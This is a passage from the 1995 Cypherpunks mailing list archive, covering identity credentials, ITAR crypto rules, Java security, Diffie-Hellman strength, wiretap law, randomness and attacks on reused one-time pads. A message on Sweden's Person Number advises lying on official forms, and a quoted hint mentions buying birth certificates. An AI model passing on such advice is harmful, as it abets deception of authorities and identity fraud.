> citizenship (at least California and Virgina licenses do not). Social
> Security cards are the same.
> 
> (Second hint: most people are hard-pressed to locate a birth certificate
> for themselves. Many people take the easy way out and simply buy a new one
> for the $25 a good one costs.)
> 
> Therefore, there are few ways that citizenship can be "checked." Period. A
> foreigner who wishes to "prove" his non-U.S. status could, of course, show
> his green card. But this is different from proving citizenship.

A green card, by itself, also fails to prove legal status.

Proving legal residency requires a combination of two documents, one each
from specified lists. Most commonly a driver's license, green card (which
is actually pink), or birth certificate from list A, and a social
security card from list B. 

Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
it's a Good Thing. Basically, for privacy and security reasons, it is a
very good idea to separate the issues of identity and authorization.

I don't care how securely you can authenticate who I am -- by PGP, retinal
scan, whatever. I do not want a single digitizable token to be the key to
my identity. Even if that identity cannot be forged (and everything can be
forged), it can be used to track me, by the government, by the Direct
Marketing Association, by the private investigators of certain wacky
cults, and by TRW. And I suppose by those secret government types at SAIC
who, we are told, control the Internet now :-)

It is a little inconvenient, but this is why it's a Good Thing that you
need a separate driver's license, social security card, credit card, phone
number, PGP key, password, thumbprint, and retina. I would oppose moves to
combine them to a single unified "mark of the beast," as it were. I am a
little uneasy about the otherwise very cool First Bank of the Internet for
this reason. If you use FBOI, I'd recommend using a PGP key separate from 
your usual PGP key.

Crypto fans need to recognize that the ability to securely prove your 
identity is not an unmitigated advance.

Of course, all the crypto fans here are also pseudonym fans.

> As to the point about students impersonating faculty, if the faculty starts
> signing their messages (doubtful), then no one can impersonate _them_.
> (Except that it sounds like all this PGP stuff is to happen on campus
> computers, in which case there are several ways their private keys and
> passphrases can be snarfed.) The issue of a "credential" for faculty
> members, something that says "This person is a member of the Foo U.
> faculty," well, this is a different kettle of fish; such credentials are
> not part of the PGP system, though webs of trust could in principle be used
> in a klugey kind of way.

This is a job for private key cryptography, like kerberos.

-rich





From tcmay at got.net  Sat Nov  4 17:40:28 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:40:28 +0800
Subject: To Repeat: Credentials Not Considered Necessary
Message-ID: <acc151232102100449bf@[205.199.118.202]>


At 1:03 AM 11/5/95, Simon Spero wrote:
>On Sat, 4 Nov 1995, Timothy C. May wrote:
>
>> Therefore, there are few ways that citizenship can be "checked." Period. A
>> foreigner who wishes to "prove" his non-U.S. status could, of course, show
>> his green card. But this is different from proving citizenship.
>>
>
>And here we have the rub. People with permanent residency (i.e. green
>cards) are fully entitled to access to strong crypto. Most foreign
>students are on J-1 visas, which do not grant permanent residency.

Irrelevant.

J-1 persons are still accorded the basic rights of citizens, save for a few
things like voting, holding certain offices, and perhaps jury duty (not
sure about this, as my recent jury summons was apparently based on my
Calif. Driver's License and required no form of identification whatsoever).

My basic point was that "J-1," "permanent resident," "citizen,"
"undocumented," and "completely and totally without proper papers" are, for
the purposes being discussed here, all essentially identical. Any sysadmin
who expects to have papers proving "citizenship" or any other status will
have a tough time.

Saying "People with permanent residency (i.e. green cards) are fully
entitled to access to strong crypto." and--presumably--implying that J-1
visa holders are _not_ entitled to use strong crypto within the U.S. (or,
for that matter, in their own countries, but this is another issue), is
misleading.

The laws about "showing a foreign national" certain items do not
differentiate, so far as I have seen, between various kinds of visas.

In any case, sysadmins generally do not ask for any kind of ID or proof of
citizenship, morality, residency, etc.

(On my many computer accounts over the years, as but one example, _never_
have I have been asked for credentials of any kind. Never. Not even a
driver's license, let alone a passport or birth certificate or whatever. My
current Internet Service Providers, netcom.com and got.net, are blithely
uncaring about the fact that I am technically a citizen of Ruritania, and
am not in the U.S. legally.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Sat Nov  4 17:53:11 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 09:53:11 +0800
Subject: Credentials Without Identity
Message-ID: <acc154b62202100420bc@[205.199.118.202]>


Rich Graves makes some very good points, but he said something I want to
riff on.

(And as a measure of how apologetic some folks are getting about discussing
anything not on Perry's List of Approved Topics, Rich unfortunately labeled
his post "[ID point semi-off-topic]..." In fact, the issue of credentials
and identity is NOT off-topic, not even semi-off-topic. It is central to
the themes of our list. I urge all to read Chaum's seminal work on
"credentials without identity.")

At 1:05 AM 11/5/95, Rich Graves wrote:

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B.
>
>Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
>it's a Good Thing. Basically, for privacy and security reasons, it is a
>very good idea to separate the issues of identity and authorization.
>
>I don't care how securely you can authenticate who I am -- by PGP, retinal
>scan, whatever. I do not want a single digitizable token to be the key to
>my identity. Even if that identity cannot be forged (and everything can be
>forged), it can be used to track me, by the government, by the Direct
>Marketing Association, by the private investigators of certain wacky
....

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

The two forms of credentials can be linked in data bases. Just because one
piece of ID has citizenship or voting status and another has other stuff is
meaningless, provided the ID forms can be linked. As they can, in multiple
ways.

The credit tracking agencies can do this trivially, with names, social
security numbers, driver's license numbers, addresses, phone numbers, etc.
All are pointers into the cloud of numbers that constitutes one's dossier.

Happily, Chaum's work on "credentials without identity," based essentially
on the kind of "blinding" used in digital cash (with some differences, of
course), allows for one to display a credential showing one is old enough
to enter a bar or library (in 2005), without revealing a name (which is
just another credential).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From loofbour at cis.ohio-state.edu  Sat Nov  4 18:07:07 1995
From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow)
Date: Sun, 5 Nov 1995 10:07:07 +0800
Subject: The Crypto Applications we would rather not talk about
In-Reply-To: <199511041900.UAA27770@utopia.hacktic.nl>
Message-ID: <199511050200.VAA11644@hammond.cis.ohio-state.edu>


Name Withheld by Request writes:
 > Crypto and Privacy tools protect everyone
 > from the hero to the anti-hero...
 > 
 >    the technology itself is neutral

Unfortunately, the technology's appearance is distinctly angled toward
the anti-hero. One, because the benefits are more obvious to the
anti-hero; and two, because the abuse of technology gets better press
than its use, particularly in the get-tough-on-crime era.

 >     The answers are there and have been published
 > in most books on tradecraft, 3 person cells organized
 > as pyramids.

I've read only fictional accounts about the 3-person cell. Any
pointers to nonfiction material? "Tradecraft" didn't seem to be the
magic keyword in the local card catalog.

nathan





From anonymous-remailer at shell.portal.com  Sat Nov  4 18:12:55 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 5 Nov 1995 10:12:55 +0800
Subject: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050203.SAA01370@jobe.shell.portal.com>


Todd Glassey <todd at lgt.com> writes:

> Pardon the flame but I really have just about heard enough of this BS...

No one needs to listen to anything if they don't want to, Todd, but I 
think that some things need saying none the less.

I think the old saying is: You can lead a horse to water, but you can't 
make him think, or something like that ...

>>This response came from Sun to Risks:
>>
>>> Date: Mon, 16 Oct 1995 21:22:40 -0700
>>> From: Caveh.Jalali at eng.sun.com (Caveh Jalali)
>>> Subject: Re: Risks in Java
>>>
>>> If we are going to "analyze" java security, let's keep in mind that
>>> there is an important distinction between the language (java) and the
>>> machinery which runs the java program. 

Hmm, this is a very interesting prespective, coming from Sun Engineering
as it were. The company that says that the Network is the machine, or
somesuch.  I always thought that security consisted of everything: 
hardware, software, and wetware. 

(Or it did the last time, I checked my handbook.)

Admittedly this is a horrible inconvenience, especially when it comes to
security. 

>>> Java is a general-purpose programming language along the lines of C/C++.
>>> So, there is no doubt that its expressive power overwhelms our 
>>> theoretician's abilities to predict java-programs behavior -- this is 
>>> where we start getting into the halting problem, computability and other 
>>> black magic.  Basically, i don't think we can "trust" programs 
>>> written in any *useful* programming language.
>>
>>Read: We can't trust Java programs.

This may well be true.  But sloppy design, design which ignores the most 
basic difficulties cannot be brushed away by simply saying that "it 
exceeds theoretician's predictive abilitiies."

That simply doesn't cut it.

"Ignoring the obvious" is simply that.  It's a planned process of
"ignoring the obvious". 

One example of this that should serve as a useful case study is a recent
problem which was brought to the Canadian public's attention just this
week, on a program called the Fifth Estate.  The CBC (Canadian
Broadcasting Corporation) detailed a software code problem in one of
AECL's (Atomic Energy of Canada Limited's) instruments which deliver
penetrating radiation. 

The software which controlled the radiation dose, would periodically
override the oncologist's calibration and deliver a radiation dose 100
times what was prescribed.  This software "bug" literally killed wherever
the machine was in use. 

A simple hardware solution engineered into the product as part of a
redundancy check program would not only have saved many lives, but could
have confirmed that there were serious code deficencies.  A redundancy
program which AECL did NOT have. 

Then again AECL did not consider that it had to mathematically prove it's 
code either.  So I guess, they "ignored the obvious" not once, but twice.

A simple lesson can be learned here, one which I believe is applicable to
Java. 

If your parameters are going to be that you cannot trust your production
code, then you MUST engineer on that basis, that the production will not
be trustworthy, rather than simply crying like Chicken Little, that
mission critical applications must simply "live with" engineered
inferiority. 

Or alternatively, another lesson could be pulled out:  To avoid this 
problem, ensure that your code is mathematically provable or utilize 
appropriate hardware overrides.

Case study, #2:  Netscape.

During their code design, they assumed that all servers on a network were
trustworthy and would continue to be trustworthy.  They designed their
product on that basis.  In fact, over time the very opposite will be true. 

As an exploitation algorithm propogates, the significant percentage of
servers which are NOT trustworthy will begin to grow exponentially. 

The true assumption which Netscape should have started with is a simple 
one, and is the only assumption that ANY production house can start 
with:  that the network has a reliable transport mechanism, one which will 
route around damage.  That's it.  Any other assumptions are poor design 
and engineering and are demonstrative of a misunderstanding of the 
environmental conditions in which the engineered product is expected to 
perform.

>Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava. Are
>you unaware that the HotJava Platform is the first generation pass at an
>inline extensible GUI harness. Underline the total concept "extensible GUI
>harness". This includes a series of tool functions to *help* perform secure
>messeging (like those supplied iun Netscape 2.0/Java.), but because of the
>enormity of the task and the number of facets on the face of this gem it
>will be some time before the final versions of the first generation will be
>available.

I can't speak for "Dr. Fred", but I always worry when people start to
refer to something as a "gem", and start talking about the "enormity of
the task".  Especially if an engineer starts talking in such lyrical,
flowery prose.

Enormous tasks always lead to complexity which can never be solved by
simple linear thinking.  And the engineer from Sun is right, that it will
be some time before first generation products are available.  

(This will certainly be the case if "mathematical proofs" become mandatory
as part of an ACT in Action plan.  )

>No one else had been working on this piece of technology before SMCC
>started their effort. From the word floating about the SMCC labs they
>didn't even know what they had.
>
>So rather than slamming them, SMCC, or their PR folks for

Well, I'd rather that marketers stick to marketing AFTER a product 
development cycle is completed.  Generally, you would think (hopefully) 
that people who are technologists, just *might* have a better knowledge 
of what they have, (or don't have) wouldn't you?

Maybe??  Or maybe not ...

After all you wouldn't want some kid, some little snotty brat, some kid
who started playing around well over a decade ago -- when he was in his
teens -- as a projadmin on one of Honeywell's Multiplexed Information and
Computing Service beasts showing you up for your temerity?  

Or would you cry about the "kid" slamming you? 

>I hope that you understand my point?. The net/net is that OLTP needs to be
>scaleable to be a saleable commodity and without the ability to do
>"java-ish" like local applets... There is no clean way to do this,

Well if we're gonna bottom line it, and talk turkey, and leave Chicken
Little back at the table, skewered as it were, I'll extend a helping hand. 

The net/net is really, really simple, a product that doesn't perform as
advertised is not a saleable commodity.  No one buys cars which don't
start or cans that leak.  Sure you can have a body by Pininfarina or one
by Alcan but if the engineering isn't there under that beautiful skin then
you don't have ANYTHING TO OFFER FOR VALUE. 

>As an aside - What blows my mind is the number of cycles people spend
>bitching and moaning about Java itself rather than working to create a
>better solution.

Well. It's just not my responsibility to create a solution.  And I have a
tendancy not to "bitch and moan".  I might be one sarcastic castrating
SOB, but bitchy and moany is not something I'm routinely accused of. 

I simply have a reputation for a degree of frankness.  Nothing personal is
meant by it.  I'm actually a very nice person. 

Truly.;-I

>I just want to say "Get a clue. Moan about something that is important and
>pertinent to the technologies at hand".
>
>
>These comments are my own -

Appreciated.  And I mean that with sincerity that your comments are
appreciated.  I understand that each person here DOES express their
individual opinions.  Sometimes some very strong opinions.  Myself
included. 

Generally, wallflowers will not find comfort on this list.  We'll 
recommend that those people should stick to writing browser programs.

Oops, scratch that last thought ...

>Sincereley,
>Todd Glassey
>todd at lgt.com


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.













From ho at cs.arizona.edu  Sat Nov  4 18:35:39 1995
From: ho at cs.arizona.edu (Hilarie Orman)
Date: Sun, 5 Nov 1995 10:35:39 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <9511050229.AA00198@uncial.CS.Arizona.EDU>


>  Recently, someone asked for a smaller prime of only 512-bits for speed.
>  This is more than enough for the strength of keys needed for DES, 3DES,
>  MD5 and SHA.  Perhaps this would be easier to have more complete and
>  robust verification as well.

Depending on what you think of the strength of those algorithms, the 512-bit
mod p system may not be strong enough.

The *strength* of 512-bit mod p DH systems is only about 56 bits.  You need
1024-bit primes for a *strength* of 80 bits.

In contrast, the 155-bit elliptic curve in the Photuris draft has a
strength of about 76 bits.





From llurch at networking.stanford.edu  Sat Nov  4 18:51:28 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 10:51:28 +0800
Subject: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.951104181249.6549N-100000@Networking.Stanford.EDU>


On Sat, 4 Nov 1995, Timothy C. May wrote:

> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics, Rich unfortunately labeled
> his post "[ID point semi-off-topic]..." In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

Thanks for the newbie correction.

In case anyone else is new to this, I couldn't find that paper, but Chaum's
ideas and references are at http://www.digicash.com/publish/sciam.html

> >Proving legal residency requires a combination of two documents, one each
> >from specified lists. Most commonly a driver's license, green card (which
> >is actually pink), or birth certificate from list A, and a social
> >security card from list B.
> >
> >Chris Hibbert's SSN FAQ talks a little bit about how this works, and why
> >it's a Good Thing. Basically, for privacy and security reasons, it is a
> >very good idea to separate the issues of identity and authorization.
> >
> >I don't care how securely you can authenticate who I am -- by PGP, retinal
> >scan, whatever. I do not want a single digitizable token to be the key to
> >my identity. Even if that identity cannot be forged (and everything can be
> >forged), it can be used to track me, by the government, by the Direct
> >Marketing Association, by the private investigators of certain wacky
> ....
> 
> Rich's (or Chris') points are admirable, but getting more and more
> irrelevant by the day. The notion of unlinking identity and authorization
> by separate pieces of identification is another form of "security through
> obscurity."

True. But until digital technology becomes ubiquitous, we're stuck with
it, and it does help. I see no analog, well, analog to credential 
technology. It absolutely requires machines that can generate and handle 
large random numbers. Right?

My point was, even people who should know better, like the managers and
clients of FBOI (fboi at netcom.com), are relying on security through appeal
to irrelevant crypto authority, which is even worse. Using your primary
pgp key as a traceable link to your credit card number or bank account can
be just as bad as publishing your credit card number. 
 
> Happily, Chaum's work on "credentials without identity," based essentially
> on the kind of "blinding" used in digital cash (with some differences, of
> course), allows for one to display a credential showing one is old enough
> to enter a bar or library (in 2005), without revealing a name (which is
> just another credential).

I haven't yet fully digested this concept, but don't you get into a bit of
a chicken-and-egg problem when you start applying this to things like
proof of age and citizenship? Until you reach a certain age, you're not
going to remember your passphrase. I still think there's a role for
private keys held by some authority (I realize that's not a popular word). 

I'd guess this would be addressed by a "secret sharer"/secsplit kind of
thing, where your parents hold a combination of keys that together can
represent your secret key until you're old enough to change it yourself. 
Still I'd worry about what kind of information was gathered about me in my
youth, and how that might be carried over into maturity. 

-rich





From llurch at networking.stanford.edu  Sat Nov  4 19:00:35 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 11:00:35 +0800
Subject: [NOISE] Re: 800_ape [FUQ Win95 List]
In-Reply-To: <Pine.3.89.9511041332.B29112-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.ULT.3.91.951104184257.6549O-100000@Networking.Stanford.EDU>


> On Sat, 4 Nov 1995, Rich Graves wrote:
> 
> > I'm putting together a "Windows 95 Frequently Unanswered Questions File."

This little P.S. attracted a lot of attention in private email. FYI, it's
now available at:

gopher://quixote.stanford.edu:70/0R1400265-1416663-/win95netbugs

and in the newsgroups. It's short. Several points are of interest, if not
direct relevance. Point D.8., apparent bugs in handling of longints, if 
confirmed, could have beaucoup crypto relevance.

For the record, I hadn't noticed the acronym, but I like it. A lot.

-rich





From tcmay at got.net  Sat Nov  4 19:17:52 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:17:52 +0800
Subject: That's not what I wrote!
Message-ID: <acc1683f23021004b7dd@[205.199.118.202]>


Some of you may think this is a trivial correction, but I think it
important, albeit bizarre:


At 2:41 AM 11/5/95, Rich Graves wrote:
>On Sat, 4 Nov 1995, Timothy C. May wrote:

>> Rich's (or Chris') points are admirable, but getting more and more
>> irrelevant by the day. The notion of unlinking identity and authorization
>> by separate pieces of identification is another form of "security through
>> obscurity."

No, that is NOT what I wrote. It has been changed, with no indication that
it is not what I wrote.

If you check my original you'll find that what I wrote was:

---

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

---

I can guess why Rich "corrected" my post, but he was in error for at least
two reasons. First, because he didn't indicate that he'd corrected me.
Second, because my item did not need correction.

I originally wrote "Chris's," referring to Chris Hibbert, and then thought
about the grammatical rules about forming possessives out of words ending
in "s," and so I added the alternative "(or Chris')".

Perhaps a minor point, and not one I'll lose sleep over, but I think it a
bad thing to _ever_ correct the words of another in quoted material without
indicating so. Editors who worry about typos and misspellings in quoted
material usually put a "[sic]" in the text, mainly, I think, to let
themselves off the hook for letting an error through. (Though I think
another reason is to show graphically the igorance [sic] of the quoted
author.)

This point about Rich's post should not distract from his good comments
that I responded to (or the points in the post that contained this
correction, points I have not yet read).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Sat Nov  4 19:28:38 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:28:38 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID: <acc16c1e24021004a0c8@[205.199.118.202]>


At 2:00 AM 11/5/95, Nathan Loofbourrow wrote:

> >     The answers are there and have been published
> > in most books on tradecraft, 3 person cells organized
> > as pyramids.
>
>I've read only fictional accounts about the 3-person cell. Any
>pointers to nonfiction material? "Tradecraft" didn't seem to be the
>magic keyword in the local card catalog.

It's easy to work out the relationships from first principles...I'm not
sure what a book would add to your understanding.

I suspect Kahn's "The Codebreakers" contains at least a brief mention of
cell organizations, thought that was not Kahn's focus.

Or, look at any of the various books on Soviet spy rings in the U.S., or
various spy rings in WW II. For example, I think the true-life book "I Led
Three Lives" might still be available--it was the basis of a t.v. show I
used to watch in the early 60s. (The t.v. show presumably went to the same
Politically Incorrect resting place as "Amos and Andy," mourned by
Sapphire, The Kingfish, and me.)

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From shamrock at netcom.com  Sat Nov  4 19:34:56 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 5 Nov 1995 11:34:56 +0800
Subject: Telephone switch capacity -Reply
Message-ID: <v02120d02acc1d4859dfc@[192.0.2.1]>


At 18:43 11/3/95, Rich Graves wrote:
>[about the FBI supposedly wanting the ability to tap 1% of all phones in
>the US simultaneously]

[...]
>Of course the FBI doesn't have the staff to listen to all these lines, and
>they need an individual court order to authorize each individual
>interception, so this numbers game is a bit of a joke.

One more time. Despite what you read in the papers, despite what most
people - even in the legal profession - believe, telephone wiretaps do
_not_ require a court order. They haven't required a court order in over a
year. The Digital Telephony Bill, which passed Congress by an overwhelming
margin, _explicitly_ allows for wiretap authorizations other than a court
order. The law does not impose any rules for these "other forms of
authorization".

"The captain signed it off" may suffice.


-- Lucky Green <mailto:shamrock at netcom.com>
   PGP encrypted mail preferred.







From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Sat Nov  4 19:46:56 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Sun, 5 Nov 1995 11:46:56 +0800
Subject: To Repeat: Credentials Not Considered Necessary
In-Reply-To: <acc151232102100449bf@[205.199.118.202]>
Message-ID: <m0tBvvQ-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Timothy C. May writes:

: At 1:03 AM 11/5/95, Simon Spero wrote:

: >And here we have the rub. People with permanent residency (i.e. green
: >cards) are fully entitled to access to strong crypto. Most foreign
: >students are on J-1 visas, which do not grant permanent residency.
: 
: Irrelevant.
: 
: J-1 persons are still accorded the basic rights of citizens, save for a few
: things like voting, holding certain offices, and perhaps jury duty (not
: sure about this, as my recent jury summons was apparently based on my
: Calif. Driver's License and required no form of identification whatsoever).

It is however a violation of the ITAR to disclose cryptographic
software (including algorithms) to students ona a J-1 visa, but not to 
someone who has a green card.

: Saying "People with permanent residency (i.e. green cards) are fully
: entitled to access to strong crypto." and--presumably--implying that J-1
: visa holders are _not_ entitled to use strong crypto within the U.S. (or,
: for that matter, in their own countries, but this is another issue), is
: misleading.

It is--if the ITAR is constitutional--a serious felony to give J-1
visa holders access to strong--and to weak--crypto, but no one has
implied that they are not entitled to use it.  Nothing in the law of
the United States says that foreign persons can't get crypto, it is
just a felony to disclose it to them (within or without the United
States).

: The laws about "showing a foreign national" certain items do not
: differentiate, so far as I have seen, between various kinds of visas.

The ITAR distinguishes between foreign persons, who are not U.S.
persons, and U.S. persons who are either United States citizens or
have a visa admitting them to permanent residency in the United
States.  The crime at issue is disclosing cryptographic software to
foreign persons.  And whether one is a foreign person does depend on 
what type of visa one has (if one is not a U.S. citizen).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From perry at piermont.com  Sat Nov  4 20:34:58 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 5 Nov 1995 12:34:58 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511050428.XAA06831@jekyll.piermont.com>



amp writes:
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.) 
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it.

Yes. What you have then is just an elaborate cipher that is not a one
time pad. For it to be a one time pad, the numbers must be truly
random and generated only once, period.

> i would think that the output of pgp should be pretty darn random.

If PGP is good enough for use as a source for cipher keying material,
then you needn't use it as a one time pad -- just use PGP directly. If
PGP isn't good enough, it certainly isn't good enough for use as
cipher keying material. In either case, it is NOT NOT NOT a one time
pad if it isn't truly random numbers -- that means physically random.

Perry





From nbrodbeck at hollandhart.com  Sat Nov  4 20:41:27 1995
From: nbrodbeck at hollandhart.com (Noah Brodbeck)
Date: Sun, 5 Nov 1995 12:41:27 +0800
Subject: Telephone switch capacity
Message-ID: <s09a2bef.049@allegro.net>


	Please be aware that the current capacity of the
telephone system in the United States (and for that matter,
most of the developed world) is only capable of supporting
between 15 and 20 percent simultaneous telephone
conversations.  If the FBI wishes to set up a system that is
capable of monitoring 1% of the total number of lines, that
equates to a ability to tap 5%, not 1% of all calls in progress.

>As the FBI's "interest" shifts from area to area, the whole
>country could rapidly come under the 1% surveillance
>directive.
>1.5 million telephone intercepts.  Or more.

								-=- Noah






From fc at all.net  Sat Nov  4 20:41:59 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 12:41:59 +0800
Subject: Real randomness generators
Message-ID: <9511032132.AA00195@all.net>


Two points:

	1 - The noisiest thing on most lists is the noise about other
	peoples' noise.

	2 - Why not use the postings of people complaining about other
	peoples' posts as a source for noise.  Surely few things in the
	Universe are more random.

On the the subject at hand:

	There are two major technical issues I have encountered in using
EM waves (which is what video and radio noise are) for generating
randomness. 

	1 - They tend to be biased toward 1 or 0.  This can often be
	compensated for by (for example) xoring one bit stream from the
	same source with the inverse of another.  By doing this enough
	times, you can eliminate many of the characteristics of interest.

	2 - Noise tends to be characteristic for different media and noise
	causes.  This is a more difficult issue.  For example, certain
	types of media tend toward short noise bursts.  In these cases,
	you have to be quite careful to assure that the bit streams meet
	the randomness criteria of the application.

As a side issue, you may find that once you start sending enough
information with truly random characteristics, you will be visited by
people that don't want you sending it.  I know people who have
experienced these visitations and felt highly constrained as a result.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From asgaard at sos.sll.se  Sat Nov  4 20:43:55 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Sun, 5 Nov 1995 12:43:55 +0800
Subject: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105034513.1465A-100000@cor.sos.sll.se>


On Sat, 4 Nov 1995, Timothy C. May wrote:

> The credit tracking agencies can do this trivially, with names, social
> security numbers, driver's license numbers, addresses, phone numbers, etc.
> All are pointers into the cloud of numbers that constitutes one's dossier.

Ah, the Swedish way is so much more convenient. Directly after birth you
get a tag around your arm, with a number that is later changed to an
entry into several databases, including 'Birth Registry' and you get
your Person Number for life, in the format YYMMDD-abcd, which is
unique (at least in Sweden). All forthcoming database entries are based
on this number, usually as a first key field. Surprise immigrants get a
preliminary number at the border (other format) and a genuine one if
later accepted. Without a Person Number you would be practically
helpless: no schooling, no drivers licence, no 'social benefits',
no bank account, no job (if your employer intends to do it legally
and cut off taxes). The only marginally possible way to get around
this is to use the Person Number of another person (forging a Swedish
Approved ID is quite a task, though, and it's not very kind to that
other person). Most Government databases are open to the public, so
the credit tracking agencies don't have to work very hard regarding
persons (sometimes a bit more with corporate entities; those can be
registered to fall guys - not hard to find in a jurisdiction with
nice jails and short sentences). 

Now, there are laws against cross-referencing various databases
without the approval of the Data Inspection, which often says no.
But if you do it illegaly, there is very little risk of detection.
It looks like the Approved ID will be a smart-card with a signing
mechanism (probably escrowed), naturally linked to the Person Number,
real soon now, at least before the mythical y.2000 . Links to physical
characteristics (retina?) are not (openly) discussed yet but may
eventually come into play.

I think there's not much to win (and a lot of conveniency to loose)
in trying to hide from this System. A friend of mine, and his wife,
had their baby born at home and hid it from the System for several
years (loosing good money from the Social Security system in that
process - in Sweden all people get many 'benefits'= transferred tax
money, regardless of income) but eventually they registered the child,
of course. It was a mere gesture.

Solution:

1) Don't fight the inevitable, like Don Quixote (sp?) did. The
   trick is to keep one's database entries as unsuspicious as
   possible. Pay politically correct items and services with
   a credit card, but use cash in transfers that the current
   (and possibly a coming, more Orwellian) regime might consider
   to be disloyal. Don't refuse to fill in forms or answer
   questions which are more or less obligatory or that might give
   you some benefits - just lie if necessary to create a normal,
   inconspicuous profile.

2) Prepare for Crypto Anarchy. Create untrackable net aliases for
   future use. Keep informed of all the tricks to bypass coming
   futile attempts to link net pseudonyms to Person Numbers (or
   physical characteristics). Enjoy (and help create and protect)
   the virtual sanctuary with digital mixes and anonymous http
   proxies (and DC-nets or something better eventually).

Mats
   
   










From ses at tipper.oit.unc.edu  Sat Nov  4 21:40:58 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 13:40:58 +0800
Subject: using pgp to make an otp
In-Reply-To: <199511050428.XAA06831@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>



On the subject of reused one-time-pads: What are the attacks that become 
available if a pad is used two times. The ones I can think of are:

known plaintext- if any parts of one message can be obtained or guessed, 
	the corresponding parts of the other message are automatically 
	obtained. 

statistics- (m1^C)^(m2^C) == m1 ^ m2. If the message is english, then 
certain combinations of letters are more frequent than others. Try more 
probably cominations first. 

Guess phrases - pick a common word - slide it down the m1^m2 text and 
see if the result looks like english - if it does, you've got a word in 
one, and a bunch of known text in another. 

The latter attack looks like it could be automated pretty well, and could 
run pretty fast, but I get the feeling I'm missing an obvious, better 
method. What's the standard way of attacking TTPs?

What's the most secure way to reuse a OTP if (say) an emergency happens 
when you're on the road, and you're out of pad? Could you build a 
sequence of keys for something like DES from widely separated bits of the 
pad, and use each key for one block, or is this likely to expose the 
original OTPed message, as well as the successor messages?

Simon





From bdolan at use.usit.net  Sat Nov  4 21:52:53 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Sun, 5 Nov 1995 13:52:53 +0800
Subject: Telephone switch capacity -Reply
